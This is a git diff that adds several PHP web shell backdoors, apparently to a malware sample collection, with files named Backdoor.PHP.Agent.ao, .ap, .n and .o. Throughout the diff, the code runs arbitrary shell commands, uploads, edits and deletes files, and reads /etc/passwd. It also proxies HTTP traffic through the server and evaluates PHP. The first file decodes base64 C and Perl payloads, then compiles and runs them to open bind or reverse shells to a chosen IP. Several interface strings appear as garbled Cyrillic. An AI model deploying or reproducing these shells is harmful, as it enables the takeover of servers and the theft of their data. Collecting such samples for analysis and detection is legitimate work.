    +"; +exit; +} +if(@$_GET['deldir']){ +@$dir=$_GET['dir']; +function deldir($dir) +{ +$handle = @opendir($dir); +while (false!==($ff = @readdir($handle))){ +if($ff != "." && $ff != ".."){ +if(@is_dir("$dir/$ff")){ +deldir("$dir/$ff"); +}else{ +@unlink("$dir/$ff"); +}}} +@closedir($handle); +if(@rmdir($dir)){ +@$success = true;} +return @$success; +} +$dir=@$dir; +deldir($dir); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo ""; +echo $copyr; +exit;} +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo $mymenu ; +echo " +Ñðåäñòâî çàìåíû:
    +(òû ìîæåøü çàìåíèòü ëþáîé òåêñò)
    +Ôàéë: $de
    +
    +1. Òâîé IP
    +2. IP microsoft.com :)
    +Çàìåíÿòü ýòî ýòèì + +
    +"; + +if(@$_POST['doit']){ + +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$this","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "
    $this çàìåíåíî íà $bythis
    +[Ïîñìîòðåòü ôàéë]


    "; + +} +echo $copyr; +exit;} + + + + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="$d/$e óäàëåí! "; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo ""; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo ""; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "
    ÒÎËÜÊÎ ×ÒÅÍÈÅ

    ";}} +echo $mymenu ; +echo " +Ñîäåðæèìîå ôàéëà:
    +$de +
    + + +
    +$c
    +
    +
    "; +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +Óäàëåíèå: òû óâåðåí?
    +Äà || Íåò +
    +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo " +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "
    ÒÎËÜÊÎ ×ÒÅÍÈÅ

    ";}} +echo $mymenu ; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +Ðåäàêòèðîâàíèå:
    +$de
    +
    + + +
    +

    + +"; +if(@$_POST['save']){ +$editf=@$_POST['editf']; +$editf=stripslashes($editf); +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo ""; +exit; +} +echo $copyr; +exit; +} + + + +echo" + + +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("
    Íàçâàíèå
    Òèï
    Ðàçìåð
    Âëàäåëåö/Ãðóïïà
    Ïðàâà
    Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïðåùåí!

    $copyr
    "); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." || $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); +return $info; +} + + +for($i=0; $i0 $linkd
    DIR 
    $owner/$group$info"; +} + +for($i=0; $i2 $files[$i]
    `$siz
    $owner/$group$info"; +} + +echo ""; +echo $copyr; +break; + +// Óñòàíîâêà áåêäîðà +case "backconnect": +echo "Óñòàíîâêà áåêäîðà / îòêðûòèå ïîðòà"; +echo "
    "; +echo ""; +echo "Îòêðûòü ïîðò "; +echo " "; +echo "Ïàðîëü äëÿ äîñòóïà "; +echo " "; +echo "Èñïîëüçîâàòü "; +echo " "; +echo ""; +echo ""; +echo ""; +echo "
    "; + +echo "Óñòàíîâêà áåêäîðà / connect-back"; +echo "
    "; +echo ""; +echo "IP-àäðåñ "; +echo " "; +echo "Ïîðò "; +echo " "; +echo "Èñïîëüçîâàòü "; +echo " "; +echo ""; +echo ""; +echo ""; +echo "
    "; + + +/* port bind C */ +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + $w_file=fopen("/tmp/bd.c","ab+") or $err=1; + if($err==1) + { + echo "
    ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/bd.c
    "; + $err=0; + } + else + { + fputs($w_file,base64_decode($port_bind_bd_c)); + fclose($w_file); + $blah=exec("gcc -o /tmp/bd /tmp/bd.c"); + unlink("/tmp/bd.c"); + $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"; + $blah=exec($bind_string); + $_POST['cmd']="ps -aux | grep bd"; + $err=0; + } +} + +/* port bind Perl */ +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + $w_file=fopen("/tmp/bdpl","ab+") or $err=1; + if($err==1) + { + echo "
    ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/
    "; + $err=0; + } + else + { + fputs($w_file,base64_decode($port_bind_bd_pl)); + fclose($w_file); + $bind_string="perl /tmp/bdpl ".$_POST['port']." &"; + $blah=exec($bind_string); + $_POST['cmd']="ps -aux | grep bdpl"; + $err=0; + } +} + +/* back connect Perl */ +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + $w_file=fopen("/tmp/back","ab+") or $err=1; + if($err==1) + { + echo "
    ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/
    "; + $err=0; + } + else + { + fputs($w_file,base64_decode($back_connect)); + fclose($w_file); + $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &"; + $blah=exec($bc_string); + $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\""; + $err=0; + } +} + +/* back connect C */ +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + $w_file=fopen("/tmp/back.c","ab+") or $err=1; + if($err==1) + { + echo "
    ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/back.c
    "; + $err=0; + } + else + { + fputs($w_file,base64_decode($back_connect_c)); + fclose($w_file); + $blah=exec("gcc -o /tmp/backc /tmp/back.c"); + unlink("/tmp/back.c"); + $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"; + $blah=exec($bc_string); + $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\""; + $err=0; + } +} +echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; +echo ""; +echo "
    Ðåçóëüòàò: "; +echo "
    "; +break; + +// Uploading +case "upload": + +echo <<Çàãðóçêà ôàéëîâ +* Çàãðóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *

    + + + + + + + + + +
    +$tend +HTML; + +if (isset($_POST['path'])){ + +$uploadfile = $_POST['path'].$_FILES['file']['name']; +if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} + +if (copy($_FILES['file']['tmp_name'], $uploadfile)) { + echo "Ôàéë óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n"; + echo "Èìÿ:" .$_FILES['file']['name']. "\n"; + echo "Ðàçìåð:" .$_FILES['file']['size']. "\n"; + +} else { + print "Íå óäà¸òñÿ çàãðóçèòü ôàéë. Info:\n"; + print_r($_FILES); +} +} + + +echo " +Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:
    + HTTP-ïóòü ê ôàéëó:
    +
    +Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà:
    +
    +"; + + +$data = @implode("", file($file3)); +$fp = @fopen($file2, "wb"); +@fputs($fp, $data); +$ok = @fclose($fp); +if($ok) +{ +$size = filesize($file2)/1024; +$sizef = sprintf("%.2f", $size); + +print "
    Âû çàãðóçèëè: ôàéë $file2 ðàçìåðîì (".$sizef."êÁ)
    "; +} +else +{ +print "
    Îøèáêà çàãðóçêè ôàéëà
    "; +} + + + + +break; +// Tools +case "tools": +echo "Ãåíåðàöèÿ md5-øèôðà

    "; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5 ñãåíåðèðîâàí:
    ".md5($md5)."";} +echo "
    +Êîäèðîâàíèå/äåêîäèðîâàíèå base64

    "; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +Êîäèðîâàíî:

    +Äåêîäèðîâàíî:

    ";} +echo "
    +DES-êîäèðîâàíèå:

    "; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "DES ñãåíåðèðîâàí:
    ".crypt($des)."";} +echo "
    +SHA1-êîäèðîâàíèå:

    "; +if(@$_POST['sha1']){ +@$des=@$_POST['sha1']; +echo "SHA1 ñãåíåðèðîâàí:
    ".sha1($sha1a)."";} + +echo ""; +echo "html-êîä -> øåñòíàäöàòèðè÷íûå çíà÷åíèÿ
    "; + + +if (isset($_POST['data'])) +{ +echo "

    Ðåçóëüòàò:
    "; +$str=str_replace("%20","",$_POST['data']); +for($i=0;$i + +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +
    "; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile1
    ";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile2
    ";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile3
    ";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile4
    ";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile5
    ";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile6
    ";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile7
    ";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile8
    ";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile9
    ";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile10
    ";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile11
    ";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile12
    ";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile13
    ";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile14
    ";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile15
    ";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile16
    ";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile17
    ";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile18
    ";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile19
    ";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "Çàãðóæåíî: $uploadfile20
    ";} +} + +exit; +break; +case "selfremover": + print "
    Ôàéë:
    Ïàïêà:
    "; +print "
    Òû óâåðåí, ÷òî õî÷åøü óäàëèòü ýòîò øåëë ñ ñåðâåðà?

    +Äà, õî÷ó | Íåò, ïóñòü åùå ïîáóäåò


    +Áóäåì óäàëÿòü "; +$path=__FILE__; +print $path; +print "?
    "; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!"; +print "Ôàéë $path íå óäàëåí!"; +}else{$hmm="Óäàëåí";} +print ""; + +} +break; + +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ao b/PHP/Backdoor.PHP.Agent.ao new file mode 100644 index 00000000..fad749d7 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ao @@ -0,0 +1,646 @@ + 'ClearScreen()', +'Clear History' => 'ClearHistory()', +'Can I function?' => "runcommand('canirun','GET')", +'Get server info' => "runcommand('showinfo','GET')", +'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", +'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", +'Running processes' => "runcommand('ps -aux','GET')", +'Readme' => "runcommand('shellhelp','GET')" + +); +$thisfile = basename(__FILE__); + +$style = ''; +$sess = __FILE__.$password; +if(isset($_POST['p4ssw0rD'])) +{ + if($_POST['p4ssw0rD'] == $password) + { + $_SESSION[$sess] = $_POST['p4ssw0rD']; + } + else + { + die("Wrong password"); + } + +} +if($_SESSION[$sess] == $password) +{ + if(isset($_SESSION['workdir'])) + { + if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) + { + chdir($_SESSION['workdir']); + } + } + + if(isset($_FILES['uploadedfile']['name'])) + { + $target_path = "./"; + $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + + } + } + + if(isset($_GET['runcmd'])) + { + + $cmd = $_GET['runcmd']; + + print "".get_current_user()."~# ". htmlspecialchars($cmd)."
    "; + + if($cmd == "") + { + print "Empty Command..type \"shellhelp\" for some ehh...help"; + } + + elseif($cmd == "upload") + { + print '
    Uploading to: '.realpath("."); + if(is_writable(realpath("."))) + { + print "
    I can write to this directory"; + } + else + { + print "
    I can't write to this directory, please choose another one."; + } + + } + elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) + { + if(file_exists($file[1]) && is_dir($file[1])) + { + chdir($file[1]); + $_SESSION['workdir'] = $file[1]; + print "Current directory changed to ".$file[1]; + } + else + { + print "Directory not found"; + } + } + + elseif(strtolower($cmd) == "shellhelp") + { +print 'Ajax/PHP Command Shell +© By Ironfist + +The shell can be used by anyone to command any server, the main purpose was +to create a shell that feels as dynamic as possible, is expandable and easy +to understand. + +If one of the command execution functions work, the shell will function fine. +Try the "canirun" command to check this. + +Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re +not used to these commands, google a little. + +Custom Functions +If you want to add your own custom command in the Quick Commands list, check +out the code. The $function array contains \'func name\' => \'javascript function\'. +Take a look at the built-in functions for examples. + +I know this readme isn\'t providing too much information, but hell, does this shell +even require one :P + +- Iron + '; + + } + elseif(ereg("editfile (.*)",$cmd,$file)) + { + if(file_exists($file[1]) && !is_dir($file[1])) + { + print "

    "; + } + else + { + print "File not found."; + } + } + elseif(ereg("deletefile (.*)",$cmd,$file)) + { + if(is_dir($file[1])) + { + if(rmdir($file[1])) + { + print "Directory succesfully deleted."; + } + else + { + print "Couldn't delete directory!"; + } + } + else + { + if(unlink($file[1])) + { + print "File succesfully deleted."; + } + else + { + print "Couldn't delete file!"; + } + } + } + elseif(strtolower($cmd) == "canirun") + { + print "If any of these functions is Enabled, the shell will function like it should.
    "; + if(function_exists(passthru)) + { + print "Passthru: Enabled
    "; + } + else + { + print "Passthru: Disabled
    "; + } + + if(function_exists(exec)) + { + print "Exec: Enabled
    "; + } + else + { + print "Exec: Disabled
    "; + } + + if(function_exists(system)) + { + print "System: Enabled
    "; + } + else + { + print "System: Disabled
    "; + } + if(function_exists(shell_exec)) + { + print "Shell_exec: Enabled
    "; + } + else + { + print "Shell_exec: Disabled
    "; + } + print "
    Safe mode will prevent some stuff, maybe command execution, if you're looking for a
    reason why the commands aren't executed, this is probally it.
    "; + if( ini_get('safe_mode') ){ + print "Safe Mode: Enabled"; + } + else + { + print "Safe Mode: Disabled"; + } + print "

    Open_basedir will block access to some files you shouldn't access.
    "; + if( ini_get('open_basedir') ){ + print "Open_basedir: Enabled"; + } + else + { + print "Open_basedir: Disabled"; + } + } + //About the shell + elseif(ereg("listdir (.*)",$cmd,$directory)) + { + + if(!file_exists($directory[1])) + { + die("Directory not found"); + } + //Some variables + chdir($directory[1]); + $i = 0; $f = 0; + $dirs = ""; + $filez = ""; + + if(!ereg("/$",$directory[1])) //Does it end with a slash? + { + $directory[1] .= "/"; //If not, add one + } + print "Listing directory: ".$directory[1]."
    "; + print ""; + + if ($handle = opendir($directory[1])) { + while (false !== ($file = readdir($handle))) { + if(is_dir($file)) + { + $dirs[$i] = $file; + $i++; + } + else + { + $filez[$f] = $file; + $f++; + } + + } + print "
    DirectoriesFiles
    "; + + foreach($dirs as $directory) + { + print "[D][W]".$directory."
    "; + } + + print "
    "; + + foreach($filez as $file) + { + print "[D]".$file."
    "; + } + + print "
    "; + } + } + elseif(strtolower($cmd) == "about") + { + print "Ajax Command Shell by Ironfist.
    Version $version"; + } + //Show info + elseif(strtolower($cmd) == "showinfo") + { + if(function_exists(disk_free_space)) + { + $free = disk_free_space("/") / 1000000; + } + else + { + $free = "N/A"; + } + if(function_exists(disk_total_space)) + { + $total = trim(disk_total_space("/") / 1000000); + } + else + { + $total = "N/A"; + } + $path = realpath ("."); + + print "Free: $free / $total MB
    Current path: $path
    Uname -a Output:
    "; + + if(function_exists(passthru)) + { + passthru("uname -a"); + } + else + { + print "Passthru is disabled :("; + } + } + //Read /etc/passwd + elseif(strtolower($cmd) == "etcpasswdfile") + { + + $pw = file('/etc/passwd/'); + foreach($pw as $line) + { + print $line; + } + + + } + //Execute any other command + else + { + + if(function_exists(passthru)) + { + passthru($cmd); + } + else + { + if(function_exists(exec)) + { + exec("ls -la",$result); + foreach($result as $output) + { + print $output."
    "; + } + } + else + { + if(function_exists(system)) + { + system($cmd); + } + else + { + if(function_exists(shell_exec)) + { + print shell_exec($cmd); + } + else + { + print "Sorry, none of the command functions works."; + } + } + } + } + } + } + + elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) + { + $file = $_POST['filetosave']; + if(!is_writable($file)) + { + if(!chmod($file, 0777)) + { + die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ + } + } + + $fh = fopen($file, 'w'); + $dt = $_POST['filecontent']; + fwrite($fh, $dt); + fclose($fh); + } + else + { +?> + +Command Shell ~ <?php print getenv("HTTP_HOST"); ?> + + + + + + + + +
    + +

    +
    Quick Commands
    + +
    + $execute) +{ +print ' 
    '; +} +?> + +
    + + +
    +
    Command history
    +
    +
    +
    About
    +
    +
    +Ajax/PHP Command Shell
    by Ironfist +
    +Version + +
    +
    + +
    Thanks to everyone @ +SharePlaza +
    +milw0rm +
    +and special greetings to everyone in rootshell +
    + +
    + + + + +
    +[Execute command] +[Upload file] +[Change directory] +[Filebrowser] +[Create File] + +
    + +
    +
    +   
    +Command:
    +
    +
    +
    +
    + + + +
    +
    You are not logged in, please login.
    Password: +
    "; +} +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ap b/PHP/Backdoor.PHP.Agent.ap new file mode 100644 index 00000000..a09ba4b4 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ap @@ -0,0 +1,181 @@ +rep)) { + $dir = opendir($this->rep); + } else { + $dir = opendir($this->pwd); + } + while($f = readdir($dir)) { + if ($f !="." && $f != "..") { + $this->list[] = $f; + } + } + } + + function view() { + + $this->file = htmlentities(highlight_file($this->file)); + } + + function edit() { + if(!is_writable($this->edit)) { + echo "Ecriture impossible sur le fichier"; + } elseif(!file_exists($this->edit)) { + echo "Le fichier n'existe pas "; + } elseif(!$this->fichier) { + $fp = fopen($this->edit,"r"); + $a = ""; + while(!feof($fp)) { + $a .= fgets($fp,1024); + } + echo"
    edit."\">
    "; + } else { + $fp = fopen($this->edit,"w+"); + fwrite($fp, $this->fichier); + fclose($fp); + echo "Le fichier a été modifié"; + + } + } + + function del() { + if(is_file($this->del)) { + if(unlink($this->del)) { + echo "Fichier supprimé"; + } else { + echo "Vous n'avez pas les droits pour supprimer ce fichier"; + } + } else { + echo $this->del." n'est pas un fichier"; + } + } + + function shell() { + echo "

    "; + system($this->shell); + } + + function proxy($host,$page) { + + $fp = fsockopen($host,80); + if (!$fp) { + echo "impossible d'etablir un connection avec l'host"; + } else { + $header = "GET ".$page." HTTP/1.1\r\n"; + $header .= "Host: ".$host."\r\n"; + $header .= "Connection: close\r\n\r\n"; + fputs($fp,$header); + while (!feof($fp)) { + $line = fgets($fp,1024); + echo $line; + } + fclose($fp); + } + } + + function ccopy($cfichier,$cdestination) { + if(!empty($cfichier) && !empty($cdestination)) { + copy($cfichier, $cdestination); + echo "Le fichier a été copié"; + } else { + echo "
    Source:
    Destination:
    "; + } + } +} +if(!empty($_REQUEST['rep'])) { + $rep = $_REQUEST['rep']."/"; +} +$pwd = $_SERVER['SCRIPT_FILENAME']; +$pwd2 = explode("/",$pwd); +$file = $_REQUEST['file']; +$edit = $_REQUEST['edit']; +$fichier = $_POST['fichier']; +$del = $_REQUEST['del']; +$shell = $_REQUEST['shell']; +$proxy = $_REQUEST['proxy']; +$copy = $_REQUEST['copy']; +$cfichier = $_POST['cfichier']; +$cdestination = $_POST['cdestination']; + +$n = count($pwd2); +$n = $n - 1; +$pwd = ""; +for ($i = 0;$i != $n;$i = $i+1) { + $pwd .= "/".$pwd2[$i]; +} + +if($proxy) { +$host2 = explode("/",$proxy); +$n = count($host2); +$host = $host2[2]; +$page = ""; +for ($i = 3;$i != $n;$i = $i+1) { + $page .= "/".$host2[$i]; +} +echo $page; +} + +echo "Index of ".$pwd.""; +$backdoor = new backdoor(); +$backdoor->pwd = $pwd; +$backdoor->rep = $rep; +$backdoor->file = $file; +$backdoor->edit = $edit; +$backdoor->fichier = $fichier; +$backdoor->del = $del; +$backdoor->shell = $shell; +$backdoor->proxy = $proxy; +echo "
    Index of ".$backdoor->pwd.""; +$backdoor->dir(); + +echo "
    ";
    +echo "Executer un shell ";
    +echo "Utiliser le serveur comme proxy ";
    +echo "Copier un fichier 
    "; +echo "\" Name Last modified Size Description"; +echo "
    "; + +if($file) { + $backdoor->view(); +} elseif($edit) { + $backdoor->edit(); +} elseif($del) { + $backdoor->del(); +} elseif($shell) { + $backdoor->shell(); +}elseif($proxy) { + $backdoor->proxy($host,$page); +}elseif($copy == 1) { + $backdoor->ccopy($cfichier,$cdestination); +} else { + echo "[DIR] Parent Directory ".date("r",realpath($rep."../"))." -
    "; + foreach ($backdoor->list as $key => $value) { + if(is_dir($rep.$value)) { + echo "[DIR]".$value."/ ".date("r",filemtime($rep.$value))." -
    "; + } else { + echo "[FILE]".$value." (edit) (del) ".date("r",filemtime($rep.$value))." 1k
    "; + } + } +} +echo "

    "; +echo "
    Coded By Charlichaplin
    "; +echo ""; \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.n b/PHP/Backdoor.PHP.Agent.n new file mode 100644 index 00000000..42977479 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.n @@ -0,0 +1,89 @@ + + + + + lama's'hell v. 3.0 + + + +
    +                              _           _
    +                             / \_______ /|_\
    +                            /          /_/ \__
    +                           /             \_/ /
    +                         _|_              |/|_
    +                         _|_  O    _    O  _|_
    +                         _|_      (_)      _|_
    +                          \                 /
    +                           _\_____________/_
    +                          /  \/  (___)  \/  \
    +                          \__(  o     o  )__/ 
    +
    + + + + + + + +
    Execute command:
    Change directory:
    Upload file:
    +

    +
    "; + } else { + echo "There was an error uploading the file, please try again!"; + } + } + if(($_POST['exe']) == "Execute") { + $curcmd = "cd ".$curdir.";".$curcmd; + $f=popen($curcmd,"r"); + while (!feof($f)) { + $buffer = fgets($f, 4096); + $string .= $buffer; + } + pclose($f); + echo htmlspecialchars($string); + } +?> +
    + + diff --git a/PHP/Backdoor.PHP.Agent.o b/PHP/Backdoor.PHP.Agent.o new file mode 100644 index 00000000..61504546 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.o @@ -0,0 +1,229 @@ + + + +KA_uShell 0.1.6 + + + + +




    "; + +// Configuration +$login = "admin"; +$pass = "123"; + + +/*/ Authentication +if (!isset($_SERVER['PHP_AUTH_USER'])) { +header('WWW-Authenticate: Basic realm="KA_uShell"'); +header('HTTP/1.0 401 Unauthorized'); +exit;} + +else { +if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login) +{ echo "×òî íàäî?"; exit;} +} +*/ + + + +if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} +elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} +else {$ac = "shell";} + +// Menu +echo " +|Shell| +|File Upload| +|Tools| +|PHP Eval Code| +|Whois| +


    ";
    +
    +
    +switch($ac) {
    +
    +// Shell
    +case "shell":
    +
    +echo <<Shell
    +
    +
    +
    +
    +$tend";
    +break;
    +
    +
    +//PHP Eval Code execution
    +case "eval":
    +
    +echo <<PHP Eval Code
    +
    +$$sern +
    +
